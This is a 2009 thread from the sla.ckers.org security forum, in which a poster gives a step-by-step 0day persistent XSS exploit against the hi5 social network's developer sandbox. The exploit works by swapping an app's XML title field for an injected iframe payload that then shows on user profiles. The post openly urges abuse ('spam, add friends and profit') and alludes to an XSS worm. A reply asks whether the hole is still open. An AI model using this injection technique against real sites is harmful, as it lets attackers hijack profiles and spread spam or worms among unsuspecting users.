Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
0day script injection in hi5 developer tools (permanent xss in users profiles)
Posted by: nemessis
Date: December 29, 2009 07:17PM

NOTE: it works only with logged hi5 users

1. Create an account.
2. Upload a pic (not necessarely).
3. Go to [betasandbox.hi5.com] and press sign up


4. Check one or all language
5. Type - personal / Purpose - blablabla



Now you are redirected to [betasandbox.hi5.com]

6. Click "Create your first App"



7. Click "Create Sample App"



8. Click "Sample App"



9. You will receive an error with page not found. Copy the user id from your browser address bar. That link looks like:
http://betasandbox.hi5.com/friend/apps/entry/www.betasandbox.hi5.com/friend/apps/developer/app/get/xml/43772?view=devCanvas&from=devhome&

In this case user id is 43772.

10. Now put your user id in this link (replace the word USERIDHERE with your user id):
http://hi5.com/friend/apps/developer/app/refresh.do?appId=USERIDHERE#/friend/apps/ajax/displayEditApp.do?appId=USERIDHERE

11. Click "Back to Dev Canvas View". When you see this image press edit and after that press save.



12. Click Add to my profile button



13. Now change the text

<?xml version="1.0" encoding="UTF-8"?>
<Module>
<ModulePrefs title="Sample App" author_email="pulea@binkmail.com" />
<Content type="html"><![CDATA[
Hello, world!
]]></Content>
</Module>

with this one.

<?xml version="1.0" encoding="UTF-8"?>
<Module>
<ModulePrefs title="<iframe src=http://site.com>" author_email="pulea@binkmail.com" />
<Content type="html"><![CDATA[
Hello, world!
]]></Content>
</Module>


Now join some groups, spam, add friends and profit. Or maybe sirdarckcat will get fun with another xss worm in Hi5 :)

http://www.rstcenter.com - Romanian Security Team
Inchirieri limuzine

Options: ReplyQuote
Re: 0day script injection in hi5 developer tools (permanent xss in users profiles)
Posted by: d4rw1n
Date: February 24, 2010 09:08AM

Is this still valid?

Options: ReplyQuote


Sorry, only registered users may post in this forum.